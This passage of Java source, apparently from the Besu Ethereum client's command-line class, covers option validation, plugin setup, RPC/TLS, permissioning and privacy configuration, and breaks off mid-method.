commandLine.registerConverter(Optional.class, Optional::of); commandLine.registerConverter(Double.class, Double::parseDouble); metricCategoryConverter.addCategories(BesuMetricCategory.class); metricCategoryConverter.addCategories(StandardMetricCategory.class); commandLine.registerConverter(MetricCategory.class, metricCategoryConverter); } private void handleUnstableOptions() { // Add unstable options final ImmutableMap.Builder<String, Object> unstableOptionsBuild = ImmutableMap.builder(); final ImmutableMap<String, Object> unstableOptions = unstableOptionsBuild .put("Ethereum Wire Protocol", unstableEthProtocolOptions) .put("Metrics", unstableMetricsCLIOptions) .put("P2P Network", unstableNetworkingOptions) .put("RPC", unstableRPCOptions) .put("DNS Configuration", unstableDnsOptions) .put("NAT Configuration", unstableNatOptions) .put("Synchronizer", unstableSynchronizerOptions) .put("TransactionPool", unstableTransactionPoolOptions) .put("Ethstats", unstableEthstatsOptions) .put("Mining", unstableMiningOptions) .put("Native Library", unstableNativeLibraryOptions) .put("Data Storage Options", unstableDataStorageOptions) .put("Launcher", unstableLauncherOptions) .build(); UnstableOptionsSubCommand.createUnstableOptions(commandLine, unstableOptions); } private void preparePlugins() { besuPluginContext.addService(PicoCLIOptions.class, new PicoCLIOptionsImpl(commandLine)); besuPluginContext.addService(SecurityModuleService.class, securityModuleService); besuPluginContext.addService(StorageService.class, storageService); besuPluginContext.addService(MetricCategoryRegistry.class, metricCategoryRegistry); // register built-in plugins new RocksDBPlugin().register(besuPluginContext); new InMemoryStoragePlugin().register(besuPluginContext); besuPluginContext.registerPlugins(pluginsDir()); metricCategoryRegistry .getMetricCategories() .forEach(metricCategoryConverter::addRegistryCategory); // register default security module securityModuleService.register( DEFAULT_SECURITY_MODULE, Suppliers.memoize(this::defaultSecurityModule)); } private SecurityModule defaultSecurityModule() { return new KeyPairSecurityModule(loadKeyPair()); } @VisibleForTesting KeyPair loadKeyPair() { return KeyPairUtil.loadKeyPair(nodePrivateKeyFile()); } private void parse( final AbstractParseResultHandler<List<Object>> resultHandler, final BesuExceptionHandler exceptionHandler, final String... args) { // Create a handler that will search for a config file option and use it for // default values // and eventually it will run regular parsing of the remaining options. final ConfigOptionSearchAndRunHandler configParsingHandler = new ConfigOptionSearchAndRunHandler( resultHandler, exceptionHandler, CONFIG_FILE_OPTION_NAME, environment); ParseArgsHelper.getLauncherOptions(unstableLauncherOptions, args); if (unstableLauncherOptions.isLauncherMode() || unstableLauncherOptions.isLauncherModeForced()) { try { final ImmutableLauncherConfig launcherConfig = ImmutableLauncherConfig.builder() .launcherScript(BesuCommand.class.getResourceAsStream("launcher.json")) .addCommandClasses( this, unstableNatOptions, unstableEthstatsOptions, unstableMiningOptions) .isLauncherForced(unstableLauncherOptions.isLauncherModeForced()) .build(); final File file = new LauncherManager(launcherConfig).run(); logger.info("Config file location : {}", file.getAbsolutePath()); commandLine.parseWithHandlers( configParsingHandler, exceptionHandler, String.format("%s=%s", CONFIG_FILE_OPTION_NAME, file.getAbsolutePath())); } catch (LauncherException e) { logger.warn("Unable to run the launcher {}", e.getMessage()); } } else { commandLine.parseWithHandlers(configParsingHandler, exceptionHandler, args); } } private void startSynchronization() { synchronize( besuController, p2pEnabled, peerDiscoveryEnabled, ethNetworkConfig, maxPeers, p2pHost, p2pInterface, p2pPort, graphQLConfiguration, jsonRpcConfiguration, webSocketConfiguration, apiConfiguration, metricsConfiguration, permissioningConfiguration, staticNodes, pidPath); } private BesuCommand startPlugins() { besuPluginContext.addService( BesuEvents.class, new BesuEventsImpl( besuController.getProtocolContext().getBlockchain(), besuController.getProtocolManager().getBlockBroadcaster(), besuController.getTransactionPool(), besuController.getSyncState())); besuPluginContext.addService(MetricsSystem.class, getMetricsSystem()); besuController.getAdditionalPluginServices().appendPluginServices(besuPluginContext); besuPluginContext.startPlugins(); return this; } public void configureLogging(final boolean announce) { // To change the configuration if color was enabled/disabled Configurator.reconfigure(); // set log level per CLI flags if (logLevel != null) { if (announce) { System.out.println("Setting logging level to " + logLevel.name()); } Configurator.setAllLevels("", logLevel); } } public static Optional<Boolean> getColorEnabled() { return Optional.ofNullable(colorEnabled); } private void configureNativeLibs() { if (unstableNativeLibraryOptions.getNativeAltbn128()) { AbstractAltBnPrecompiledContract.enableNative(); } if (unstableNativeLibraryOptions.getNativeSecp256k1()) { SignatureAlgorithmFactory.getInstance().enableNative(); } } private BesuCommand validateOptions() { issueOptionWarnings(); validateP2PInterface(p2pInterface); validateMiningParams(); validateNatParams(); validateNetStatsParams(); validateDnsOptionsParams(); return this; } @SuppressWarnings("ConstantConditions") private void validateMiningParams() { if (isMiningEnabled && coinbase == null) { throw new ParameterException( this.commandLine, "Unable to mine without a valid coinbase. Either disable mining (remove --miner-enabled) " + "or specify the beneficiary of mining (via --miner-coinbase <Address>)"); } if (!isMiningEnabled && iStratumMiningEnabled) { throw new ParameterException( this.commandLine, "Unable to mine with Stratum if mining is disabled. Either disable Stratum mining (remove --miner-stratum-enabled) " + "or specify mining is enabled (--miner-enabled)"); } } protected void validateP2PInterface(final String p2pInterface) { final String failMessage = "The provided --p2p-interface is not available: " + p2pInterface; try { if (!NetworkUtility.isNetworkInterfaceAvailable(p2pInterface)) { throw new ParameterException(commandLine, failMessage); } } catch (final UnknownHostException | SocketException e) { throw new ParameterException(commandLine, failMessage, e); } } @SuppressWarnings("ConstantConditions") private void validateNatParams() { if (!(natMethod.equals(NatMethod.AUTO) || natMethod.equals(NatMethod.KUBERNETES)) && !unstableNatOptions .getNatManagerServiceName() .equals(DEFAULT_BESU_SERVICE_NAME_FILTER)) { throw new ParameterException( this.commandLine, "The `--Xnat-kube-service-name` parameter is only used in kubernetes mode. Either remove --Xnat-kube-service-name" + " or select the KUBERNETES mode (via --nat--method=KUBERNETES)"); } if (natMethod.equals(NatMethod.AUTO) && !unstableNatOptions.getNatMethodFallbackEnabled()) { throw new ParameterException( this.commandLine, "The `--Xnat-method-fallback-enabled` parameter cannot be used in AUTO mode. Either remove --Xnat-method-fallback-enabled" + " or select another mode (via --nat--method=XXXX)"); } } private void validateNetStatsParams() { if (Strings.isNullOrEmpty(unstableEthstatsOptions.getEthstatsUrl()) && !unstableEthstatsOptions.getEthstatsContact().isEmpty()) { throw new ParameterException( this.commandLine, "The `--Xethstats-contact` requires ethstats server URL to be provided. Either remove --Xethstats-contact" + " or provide an url (via --Xethstats=nodename:secret@host:port)"); } } private void validateDnsOptionsParams() { if (!unstableDnsOptions.getDnsEnabled() && unstableDnsOptions.getDnsUpdateEnabled()) { throw new ParameterException( this.commandLine, "The `--Xdns-update-enabled` requires dns to be enabled. Either remove --Xdns-update-enabled" + " or specify dns is enabled (--Xdns-enabled)"); } } private GenesisConfigOptions readGenesisConfigOptions() { final GenesisConfigOptions genesisConfigOptions; try { final GenesisConfigFile genesisConfigFile = GenesisConfigFile.fromConfig(genesisConfig()); genesisConfigOptions = genesisConfigFile.getConfigOptions(genesisConfigOverrides); } catch (final Exception e) { throw new IllegalStateException("Unable to read genesis file for GoQuorum options", e); } return genesisConfigOptions; } private void issueOptionWarnings() { // Check that P2P options are able to work CommandLineUtils.checkOptionDependencies( logger, commandLine, "--p2p-enabled", !p2pEnabled, asList( "--bootnodes", "--discovery-enabled", "--max-peers", "--banned-node-id", "--banned-node-ids", "--p2p-host", "--p2p-interface", "--p2p-port", "--remote-connections-max-percentage")); // Check that mining options are able to work CommandLineUtils.checkOptionDependencies( logger, commandLine, "--miner-enabled", !isMiningEnabled, asList( "--miner-coinbase", "--min-block-occupancy-ratio", "--miner-extra-data", "--miner-stratum-enabled", "--Xminer-remote-sealers-limit", "--Xminer-remote-sealers-hashrate-ttl")); CommandLineUtils.checkMultiOptionDependencies( logger, commandLine, List.of("--miner-enabled", "--goquorum-compatibility-enabled"), List.of(!isMiningEnabled, !isGoQuorumCompatibilityMode), singletonList("--min-gas-price")); CommandLineUtils.checkOptionDependencies( logger, commandLine, "--sync-mode", !SyncMode.FAST.equals(syncMode), singletonList("--fast-sync-min-peers")); if (!securityModuleName.equals(DEFAULT_SECURITY_MODULE) && nodePrivateKeyFile != null) { logger.warn( DEPENDENCY_WARNING_MSG, "--node-private-key-file", "--security-module=" + DEFAULT_SECURITY_MODULE); } } private BesuCommand configure() throws Exception { checkPortClash(); syncMode = Optional.ofNullable(syncMode) .orElse( genesisFile == null && !isPrivacyEnabled && network != NetworkName.DEV ? SyncMode.FAST : SyncMode.FULL); ethNetworkConfig = updateNetworkConfig(getNetwork()); checkGoQuorumGenesisConfig(); checkGoQuorumCompatibilityConfig(ethNetworkConfig); jsonRpcConfiguration = jsonRpcConfiguration(); graphQLConfiguration = graphQLConfiguration(); webSocketConfiguration = webSocketConfiguration(); apiConfiguration = apiConfiguration(); // hostsWhitelist is a hidden option. If it is specified, add the list to hostAllowlist if (!hostsWhitelist.isEmpty()) { // if allowlist == default values, remove the default values if (hostsAllowlist.size() == 2 && hostsAllowlist.containsAll(List.of("localhost", "127.0.0.1"))) { hostsAllowlist.removeAll(List.of("localhost", "127.0.0.1")); } hostsAllowlist.addAll(hostsWhitelist); } permissioningConfiguration = permissioningConfiguration(); staticNodes = loadStaticNodes(); logger.info("Connecting to {} static nodes.", staticNodes.size()); logger.trace("Static Nodes = {}", staticNodes); final List<EnodeURL> enodeURIs = ethNetworkConfig.getBootNodes(); permissioningConfiguration .flatMap(PermissioningConfiguration::getLocalConfig) .ifPresent(p -> ensureAllNodesAreInAllowlist(enodeURIs, p)); permissioningConfiguration .flatMap(PermissioningConfiguration::getLocalConfig) .ifPresent(p -> ensureAllNodesAreInAllowlist(staticNodes, p)); metricsConfiguration = metricsConfiguration(); logger.info("Security Module: {}", securityModuleName); instantiateSignatureAlgorithmFactory(); return this; } private GoQuorumPrivacyParameters configureGoQuorumPrivacy( final KeyValueStorageProvider storageProvider) { return new GoQuorumPrivacyParameters( createGoQuorumEnclave(), readEnclaveKey(), storageProvider.createGoQuorumPrivateStorage(), createPrivateWorldStateArchive(storageProvider)); } private GoQuorumEnclave createGoQuorumEnclave() { final EnclaveFactory enclaveFactory = new EnclaveFactory(Vertx.vertx()); if (privacyKeyStoreFile != null) { return enclaveFactory.createGoQuorumEnclave( privacyUrl, privacyKeyStoreFile, privacyKeyStorePasswordFile, privacyTlsKnownEnclaveFile); } else { return enclaveFactory.createGoQuorumEnclave(privacyUrl); } } private String readEnclaveKey() { final String key; try { key = Files.asCharSource(privacyPublicKeyFile, UTF_8).read(); } catch (final Exception e) { throw new ParameterException( this.commandLine, "--privacy-public-key-file must be set when --goquorum-compatibility-enabled is set to true.", e); } if (key.length() != 44) { throw new IllegalArgumentException( "Contents of enclave public key file needs to be 44 characters long to decode to a valid 32 byte public key."); } // throws exception if invalid base 64 Base64.getDecoder().decode(key); return key; } private NetworkName getNetwork() { // noinspection ConstantConditions network is not always null but injected by // PicoCLI if used return network == null ? MAINNET : network; } private void ensureAllNodesAreInAllowlist( final Collection<EnodeURL> enodeAddresses, final LocalPermissioningConfiguration permissioningConfiguration) { try { PermissioningConfigurationValidator.areAllNodesAreInAllowlist( enodeAddresses, permissioningConfiguration); } catch (final Exception e) { throw new ParameterException(this.commandLine, e.getMessage()); } } private BesuCommand controller() { besuController = buildController(); return this; } public BesuController buildController() { try { return getControllerBuilder().build(); } catch (final Exception e) { throw new ExecutionException(this.commandLine, e.getMessage(), e); } } public BesuControllerBuilder getControllerBuilder() { final KeyValueStorageProvider storageProvider = keyValueStorageProvider(keyValueStorageName); return controllerBuilderFactory .fromEthNetworkConfig(updateNetworkConfig(getNetwork()), genesisConfigOverrides) .synchronizerConfiguration(buildSyncConfig()) .ethProtocolConfiguration(unstableEthProtocolOptions.toDomainObject()) .dataDirectory(dataDir()) .miningParameters( new MiningParameters( coinbase, minTransactionGasPrice, extraData, isMiningEnabled, iStratumMiningEnabled, stratumNetworkInterface, stratumPort, unstableMiningOptions.getStratumExtranonce(), Optional.empty(), minBlockOccupancyRatio, unstableMiningOptions.getRemoteSealersLimit(), unstableMiningOptions.getRemoteSealersTimeToLive())) .transactionPoolConfiguration(buildTransactionPoolConfiguration()) .nodeKey(buildNodeKey()) .metricsSystem(metricsSystem.get()) .privacyParameters(privacyParameters(storageProvider)) .clock(Clock.systemUTC()) .isRevertReasonEnabled(isRevertReasonEnabled) .storageProvider(storageProvider) .isPruningEnabled(isPruningEnabled()) .pruningConfiguration( new PrunerConfiguration(pruningBlockConfirmations, pruningBlocksRetained)) .genesisConfigOverrides(genesisConfigOverrides) .gasLimitCalculator( Optional.ofNullable(targetGasLimit) .<GasLimitCalculator>map(TargetingGasLimitCalculator::new) .orElse(GasLimitCalculator.constant())) .requiredBlocks(requiredBlocks) .reorgLoggingThreshold(reorgLoggingThreshold) .dataStorageConfiguration(unstableDataStorageOptions.toDomainObject()); } private GraphQLConfiguration graphQLConfiguration() { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--graphql-http-enabled", !isGraphQLHttpEnabled, asList("--graphql-http-cors-origins", "--graphql-http-host", "--graphql-http-port")); final GraphQLConfiguration graphQLConfiguration = GraphQLConfiguration.createDefault(); graphQLConfiguration.setEnabled(isGraphQLHttpEnabled); graphQLConfiguration.setHost(graphQLHttpHost); graphQLConfiguration.setPort(graphQLHttpPort); graphQLConfiguration.setHostsAllowlist(hostsAllowlist); graphQLConfiguration.setCorsAllowedDomains(graphQLHttpCorsAllowedOrigins); graphQLConfiguration.setHttpTimeoutSec(unstableRPCOptions.getHttpTimeoutSec()); return graphQLConfiguration; } private JsonRpcConfiguration jsonRpcConfiguration() { checkRpcTlsClientAuthOptionsDependencies(); checkRpcTlsOptionsDependencies(); checkRpcHttpOptionsDependencies(); if (isRpcHttpAuthenticationEnabled && rpcHttpAuthenticationCredentialsFile() == null && rpcHttpAuthenticationPublicKeyFile == null) { throw new ParameterException( commandLine, "Unable to authenticate JSON-RPC HTTP endpoint without a supplied credentials file or authentication public key file"); } final JsonRpcConfiguration jsonRpcConfiguration = JsonRpcConfiguration.createDefault(); jsonRpcConfiguration.setEnabled(isRpcHttpEnabled); jsonRpcConfiguration.setHost(rpcHttpHost); jsonRpcConfiguration.setPort(rpcHttpPort); jsonRpcConfiguration.setMaxActiveConnections(rpcHttpMaxConnections); jsonRpcConfiguration.setCorsAllowedDomains(rpcHttpCorsAllowedOrigins); jsonRpcConfiguration.setRpcApis(rpcHttpApis.stream().distinct().collect(Collectors.toList())); jsonRpcConfiguration.setHostsAllowlist(hostsAllowlist); jsonRpcConfiguration.setAuthenticationEnabled(isRpcHttpAuthenticationEnabled); jsonRpcConfiguration.setAuthenticationCredentialsFile(rpcHttpAuthenticationCredentialsFile()); jsonRpcConfiguration.setAuthenticationPublicKeyFile(rpcHttpAuthenticationPublicKeyFile); jsonRpcConfiguration.setTlsConfiguration(rpcHttpTlsConfiguration()); jsonRpcConfiguration.setHttpTimeoutSec(unstableRPCOptions.getHttpTimeoutSec()); return jsonRpcConfiguration; } private void checkRpcHttpOptionsDependencies() { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--rpc-http-enabled", !isRpcHttpEnabled, asList( "--rpc-http-api", "--rpc-http-apis", "--rpc-http-cors-origins", "--rpc-http-host", "--rpc-http-port", "--rpc-http-max-active-connections", "--rpc-http-authentication-enabled", "--rpc-http-authentication-credentials-file", "--rpc-http-authentication-public-key-file", "--rpc-http-tls-enabled", "--rpc-http-tls-keystore-file", "--rpc-http-tls-keystore-password-file", "--rpc-http-tls-client-auth-enabled", "--rpc-http-tls-known-clients-file", "--rpc-http-tls-ca-clients-enabled")); } private void checkRpcTlsOptionsDependencies() { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--rpc-http-tls-enabled", !isRpcHttpTlsEnabled, asList( "--rpc-http-tls-keystore-file", "--rpc-http-tls-keystore-password-file", "--rpc-http-tls-client-auth-enabled", "--rpc-http-tls-known-clients-file", "--rpc-http-tls-ca-clients-enabled")); } private void checkRpcTlsClientAuthOptionsDependencies() { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--rpc-http-tls-client-auth-enabled", !isRpcHttpTlsClientAuthEnabled, asList("--rpc-http-tls-known-clients-file", "--rpc-http-tls-ca-clients-enabled")); } private void checkPrivacyTlsOptionsDependencies() { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--privacy-tls-enabled", !isPrivacyTlsEnabled, asList( "--privacy-tls-keystore-file", "--privacy-tls-keystore-password-file", "--privacy-tls-known-enclave-file")); } private Optional<TlsConfiguration> rpcHttpTlsConfiguration() { if (!isRpcTlsConfigurationRequired()) { return Optional.empty(); } if (rpcHttpTlsKeyStoreFile == null) { throw new ParameterException( commandLine, "Keystore file is required when TLS is enabled for JSON-RPC HTTP endpoint"); } if (rpcHttpTlsKeyStorePasswordFile == null) { throw new ParameterException( commandLine, "File containing password to unlock keystore is required when TLS is enabled for JSON-RPC HTTP endpoint"); } if (isRpcHttpTlsClientAuthEnabled && !isRpcHttpTlsCAClientsEnabled && rpcHttpTlsKnownClientsFile == null) { throw new ParameterException( commandLine, "Known-clients file must be specified or CA clients must be enabled when TLS client authentication is enabled for JSON-RPC HTTP endpoint"); } return Optional.of( TlsConfiguration.Builder.aTlsConfiguration() .withKeyStorePath(rpcHttpTlsKeyStoreFile) .withKeyStorePasswordSupplier( new FileBasedPasswordProvider(rpcHttpTlsKeyStorePasswordFile)) .withClientAuthConfiguration(rpcHttpTlsClientAuthConfiguration()) .build()); } private TlsClientAuthConfiguration rpcHttpTlsClientAuthConfiguration() { if (isRpcHttpTlsClientAuthEnabled) { return TlsClientAuthConfiguration.Builder.aTlsClientAuthConfiguration() .withKnownClientsFile(rpcHttpTlsKnownClientsFile) .withCaClientsEnabled(isRpcHttpTlsCAClientsEnabled) .build(); } return null; } private boolean isRpcTlsConfigurationRequired() { return isRpcHttpEnabled && isRpcHttpTlsEnabled; } private WebSocketConfiguration webSocketConfiguration() { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--rpc-ws-enabled", !isRpcWsEnabled, asList( "--rpc-ws-api", "--rpc-ws-apis", "--rpc-ws-host", "--rpc-ws-port", "--rpc-ws-max-active-connections", "--rpc-ws-authentication-enabled", "--rpc-ws-authentication-credentials-file", "--rpc-ws-authentication-public-key-file")); if (isRpcWsAuthenticationEnabled && rpcWsAuthenticationCredentialsFile() == null && rpcWsAuthenticationPublicKeyFile == null) { throw new ParameterException( commandLine, "Unable to authenticate JSON-RPC WebSocket endpoint without a supplied credentials file or authentication public key file"); } final WebSocketConfiguration webSocketConfiguration = WebSocketConfiguration.createDefault(); webSocketConfiguration.setEnabled(isRpcWsEnabled); webSocketConfiguration.setHost(rpcWsHost); webSocketConfiguration.setPort(rpcWsPort); webSocketConfiguration.setMaxActiveConnections(rpcWsMaxConnections); webSocketConfiguration.setRpcApis(rpcWsApis); webSocketConfiguration.setAuthenticationEnabled(isRpcWsAuthenticationEnabled); webSocketConfiguration.setAuthenticationCredentialsFile(rpcWsAuthenticationCredentialsFile()); webSocketConfiguration.setHostsAllowlist(hostsAllowlist); webSocketConfiguration.setAuthenticationPublicKeyFile(rpcWsAuthenticationPublicKeyFile); webSocketConfiguration.setTimeoutSec(unstableRPCOptions.getWsTimeoutSec()); return webSocketConfiguration; } private ApiConfiguration apiConfiguration() { return ImmutableApiConfiguration.builder() .gasPriceBlocks(apiGasPriceBlocks) .gasPricePercentile(apiGasPricePercentile) .gasPriceMin(minTransactionGasPrice.toLong()) .gasPriceMax(apiGasPriceMax) .build(); } public MetricsConfiguration metricsConfiguration() { if (isMetricsEnabled && isMetricsPushEnabled) { throw new ParameterException( this.commandLine, "--metrics-enabled option and --metrics-push-enabled option can't be used at the same " + "time. Please refer to CLI reference for more details about this constraint."); } CommandLineUtils.checkOptionDependencies( logger, commandLine, "--metrics-enabled", !isMetricsEnabled, asList("--metrics-host", "--metrics-port")); CommandLineUtils.checkOptionDependencies( logger, commandLine, "--metrics-push-enabled", !isMetricsPushEnabled, asList( "--metrics-push-host", "--metrics-push-port", "--metrics-push-interval", "--metrics-push-prometheus-job")); return unstableMetricsCLIOptions .toDomainObject() .enabled(isMetricsEnabled) .host(metricsHost) .port(metricsPort) .protocol(metricsProtocol) .metricCategories(metricCategories) .pushEnabled(isMetricsPushEnabled) .pushHost(metricsPushHost) .pushPort(metricsPushPort) .pushInterval(metricsPushInterval) .hostsAllowlist(hostsAllowlist) .prometheusJob(metricsPrometheusJob) .build(); } private Optional<PermissioningConfiguration> permissioningConfiguration() throws Exception { if (!(localPermissionsEnabled() || contractPermissionsEnabled())) { if (rpcHttpApis.contains(RpcApis.PERM) || rpcWsApis.contains(RpcApis.PERM)) { logger.warn( "Permissions are disabled. Cannot enable PERM APIs when not using Permissions."); } return Optional.empty(); } final Optional<LocalPermissioningConfiguration> localPermissioningConfigurationOptional; if (localPermissionsEnabled()) { final Optional<String> nodePermissioningConfigFile = Optional.ofNullable(nodePermissionsConfigFile); final Optional<String> accountPermissioningConfigFile = Optional.ofNullable(accountPermissionsConfigFile); final LocalPermissioningConfiguration localPermissioningConfiguration = PermissioningConfigurationBuilder.permissioningConfiguration( permissionsNodesEnabled, getEnodeDnsConfiguration(), nodePermissioningConfigFile.orElse(getDefaultPermissioningFilePath()), permissionsAccountsEnabled, accountPermissioningConfigFile.orElse(getDefaultPermissioningFilePath())); localPermissioningConfigurationOptional = Optional.of(localPermissioningConfiguration); } else { if (nodePermissionsConfigFile != null && !permissionsNodesEnabled) { logger.warn( "Node permissioning config file set {} but no permissions enabled", nodePermissionsConfigFile); } if (accountPermissionsConfigFile != null && !permissionsAccountsEnabled) { logger.warn( "Account permissioning config file set {} but no permissions enabled", accountPermissionsConfigFile); } localPermissioningConfigurationOptional = Optional.empty(); } final SmartContractPermissioningConfiguration smartContractPermissioningConfiguration = SmartContractPermissioningConfiguration.createDefault(); if (permissionsNodesContractEnabled) { if (permissionsNodesContractAddress == null) { throw new ParameterException( this.commandLine, "No node permissioning contract address specified. Cannot enable smart contract based node permissioning."); } else { smartContractPermissioningConfiguration.setSmartContractNodeAllowlistEnabled( permissionsNodesContractEnabled); smartContractPermissioningConfiguration.setNodeSmartContractAddress( permissionsNodesContractAddress); smartContractPermissioningConfiguration.setNodeSmartContractInterfaceVersion( permissionsNodesContractVersion); } } else if (permissionsNodesContractAddress != null) { logger.warn( "Node permissioning smart contract address set {} but smart contract node permissioning is disabled.", permissionsNodesContractAddress); } if (permissionsAccountsContractEnabled) { if (permissionsAccountsContractAddress == null) { throw new ParameterException( this.commandLine, "No account permissioning contract address specified. Cannot enable smart contract based account permissioning."); } else { smartContractPermissioningConfiguration.setSmartContractAccountAllowlistEnabled( permissionsAccountsContractEnabled); smartContractPermissioningConfiguration.setAccountSmartContractAddress( permissionsAccountsContractAddress); } } else if (permissionsAccountsContractAddress != null) { logger.warn( "Account permissioning smart contract address set {} but smart contract account permissioning is disabled.", permissionsAccountsContractAddress); } final PermissioningConfiguration permissioningConfiguration = new PermissioningConfiguration( localPermissioningConfigurationOptional, Optional.of(smartContractPermissioningConfiguration), quorumPermissioningConfig()); return Optional.of(permissioningConfiguration); } private Optional<GoQuorumPermissioningConfiguration> quorumPermissioningConfig() { if (!isGoQuorumCompatibilityMode) { return Optional.empty(); } try { final GenesisConfigOptions genesisConfigOptions = readGenesisConfigOptions(); final OptionalLong qip714BlockNumber = genesisConfigOptions.getQip714BlockNumber(); return Optional.of( GoQuorumPermissioningConfiguration.enabled( qip714BlockNumber.orElse(QIP714_DEFAULT_BLOCK))); } catch (final Exception e) { throw new IllegalStateException("Error reading GoQuorum permissioning options", e); } } private boolean localPermissionsEnabled() { return permissionsAccountsEnabled || permissionsNodesEnabled; } private boolean contractPermissionsEnabled() { return permissionsNodesContractEnabled || permissionsAccountsContractEnabled; } private PrivacyParameters privacyParameters(final KeyValueStorageProvider storageProvider) { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--privacy-enabled", !isPrivacyEnabled, asList("--privacy-multi-tenancy-enabled", "--privacy-tls-enabled")); CommandLineUtils.checkMultiOptionDependencies( logger, commandLine, List.of("--privacy-enabled", "--goquorum-compatibility-enabled"), List.of(!isPrivacyEnabled, !isGoQuorumCompatibilityMode), List.of("--privacy-url", "--privacy-public-key-file")); checkPrivacyTlsOptionsDependencies(); final PrivacyParameters.Builder privacyParametersBuilder = new PrivacyParameters.Builder(); if (isPrivacyEnabled) { final String errorSuffix = "cannot be enabled with privacy."; if (syncMode == SyncMode.FAST) { throw new ParameterException(commandLine, String.format("%s %s", "Fast sync", errorSuffix)); } if (isPruningEnabled()) { throw new ParameterException(commandLine, String.format("%s %s", "Pruning", errorSuffix)); } if (isGoQuorumCompatibilityMode) { throw new ParameterException( commandLine, String.format("%s %s", "GoQuorum mode", errorSuffix)); } if (isPrivacyMultiTenancyEnabled && !jsonRpcConfiguration.isAuthenticationEnabled() && !webSocketConfiguration.isAuthenticationEnabled()) { throw new ParameterException( commandLine, "Privacy multi-tenancy requires either http authentication to be enabled or WebSocket authentication to be enabled"); } privacyParametersBuilder.setEnabled(true); privacyParametersBuilder.setEnclaveUrl(privacyUrl); privacyParametersBuilder.setMultiTenancyEnabled(isPrivacyMultiTenancyEnabled); privacyParametersBuilder.setOnchainPrivacyGroupsEnabled(isFlexiblePrivacyGroupsEnabled); final boolean hasPrivacyPublicKey = privacyPublicKeyFile != null; if (hasPrivacyPublicKey && !isPrivacyMultiTenancyEnabled) { try { privacyParametersBuilder.setEnclavePublicKeyUsingFile(privacyPublicKeyFile); } catch (final IOException e) { throw new ParameterException( commandLine, "Problem with privacy-public-key-file: " + e.getMessage(), e); } catch (final IllegalArgumentException e) { throw new ParameterException( commandLine, "Contents of privacy-public-key-file invalid: " + e.getMessage(), e); } } else if (hasPrivacyPublicKey) { throw new ParameterException( commandLine, "Privacy multi-tenancy and privacy public key cannot be used together"); } else if (!isPrivacyMultiTenancyEnabled) { throw new ParameterException( commandLine, "Please specify Enclave public key file path to enable privacy"); } if (Wei.ZERO.compareTo(minTransactionGasPrice) < 0) { // if gas is required, cannot use random keys to sign private tx // ie --privacy-marker-transaction-signing-key-file must be set if (privacyMarkerTransactionSigningKeyPath == null) { throw new ParameterException( commandLine, "Not a free gas network. --privacy-marker-transaction-signing-key-file must be specified and must be a funded account. Private transactions cannot be signed by random (non-funded) accounts in paid gas networks"); } } if (!Address.PRIVACY.equals(privacyPrecompiledAddress)) { logger.warn( "--privacy-precompiled-address option is deprecated. This address is derived, based on --privacy-onchain-groups-enabled."); } privacyParametersBuilder.setPrivateKeyPath(privacyMarkerTransactionSigningKeyPath); privacyParametersBuilder.setStorageProvider( privacyKeyStorageProvider(keyValueStorageName + "-privacy")); if (isPrivacyTlsEnabled) { privacyParametersBuilder.setPrivacyKeyStoreFile(privacyKeyStoreFile); privacyParametersBuilder.setPrivacyKeyStorePasswordFile(privacyKeyStorePasswordFile); privacyParametersBuilder.setPrivacyTlsKnownEnclaveFile(privacyTlsKnownEnclaveFile); } privacyParametersBuilder.setEnclaveFactory(new EnclaveFactory(vertx)); } else if (isGoQuorumCompatibilityMode) { privacyParametersBuilder.setGoQuorumPrivacyParameters( Optional.of(configureGoQuorumPrivacy(storageProvider))); } if (!isPrivacyEnabled && anyPrivacyApiEnabled()) { logger.warn("Privacy is disabled. Cannot use EEA/PRIV API methods when not using Privacy."); } if (!isGoQuorumCompatibilityMode && (rpcHttpApis.contains(RpcApis.GOQUORUM) || rpcWsApis.contains(RpcApis.GOQUORUM))) { logger.warn("Cannot use GOQUORUM API methods when not in GoQuorum mode."); } final PrivacyParameters privacyParameters = privacyParametersBuilder.build(); if (isPrivacyEnabled) { preSynchronizationTaskRunner.addTask( new PrivateDatabaseMigrationPreSyncTask(privacyParameters, migratePrivateDatabase)); } return privacyParameters; } public WorldStateArchive createPrivateWorldStateArchive(final StorageProvider storageProvider) { final WorldStateStorage privateWorldStateStorage = storageProvider.createPrivateWorldStateStorage(); final WorldStatePreimageStorage preimageStorage = storageProvider.createPrivateWorldStatePreimageStorage(); return new DefaultWorldStateArchive(privateWorldStateStorage, preimageStorage); } private boolean anyPrivacyApiEnabled() { return rpcHttpApis.contains(RpcApis.EEA) || rpcWsApis.contains(RpcApis.EEA) || rpcHttpApis.contains(RpcApis.PRIV) || rpcWsApis.contains(RpcApis.PRIV); } private PrivacyKeyValueStorageProvider privacyKeyStorageProvider(final String name) { return new PrivacyKeyValueStorageProviderBuilder() .withStorageFactory(privacyKeyValueStorageFactory(name)) .withCommonConfiguration(pluginCommonConfiguration) .withMetricsSystem(getMetricsSystem()) .build(); } private PrivacyKeyValueStorageFactory privacyKeyValueStorageFactory(final String name) { return (PrivacyKeyValueStorageFactory) storageService .getByName(name) .orElseThrow( () -> new StorageException("No KeyValueStorageFactory found for key: " + name)); } private KeyValueStorageProvider keyValueStorageProvider(final String name) { if (this.keyValueStorageProvider == null) { this.keyValueStorageProvider = new KeyValueStorageProviderBuilder() .withStorageFactory( storageService .getByName(name) .orElseThrow( () -> new StorageException( "No KeyValueStorageFactory found for key: " + name))) .withCommonConfiguration(pluginCommonConfiguration) .withMetricsSystem(getMetricsSystem()) .build(); } return this.keyValueStorageProvider; } private SynchronizerConfiguration buildSyncConfig() { return unstableSynchronizerOptions .toDomainObject() .syncMode(syncMode) .fastSyncMinimumPeerCount(fastSyncMinPeerCount) .build(); } private TransactionPoolConfiguration buildTransactionPoolConfiguration() { return unstableTransactionPoolOptions .toDomainObject() .txPoolMaxSize(txPoolMaxSize) .pooledTransactionHashesSize(pooledTransactionHashesSize) .pendingTxRetentionPeriod(pendingTxRetentionPeriod) .priceBump(Percentage.fromInt(priceBump)) .txFeeCap(txFeeCap) .build(); } private boolean isPruningEnabled() { return pruningEnabled; } // Blockchain synchronisation from peers. private void synchronize( final BesuController controller, final boolean p2pEnabled, final boolean peerDiscoveryEnabled, final 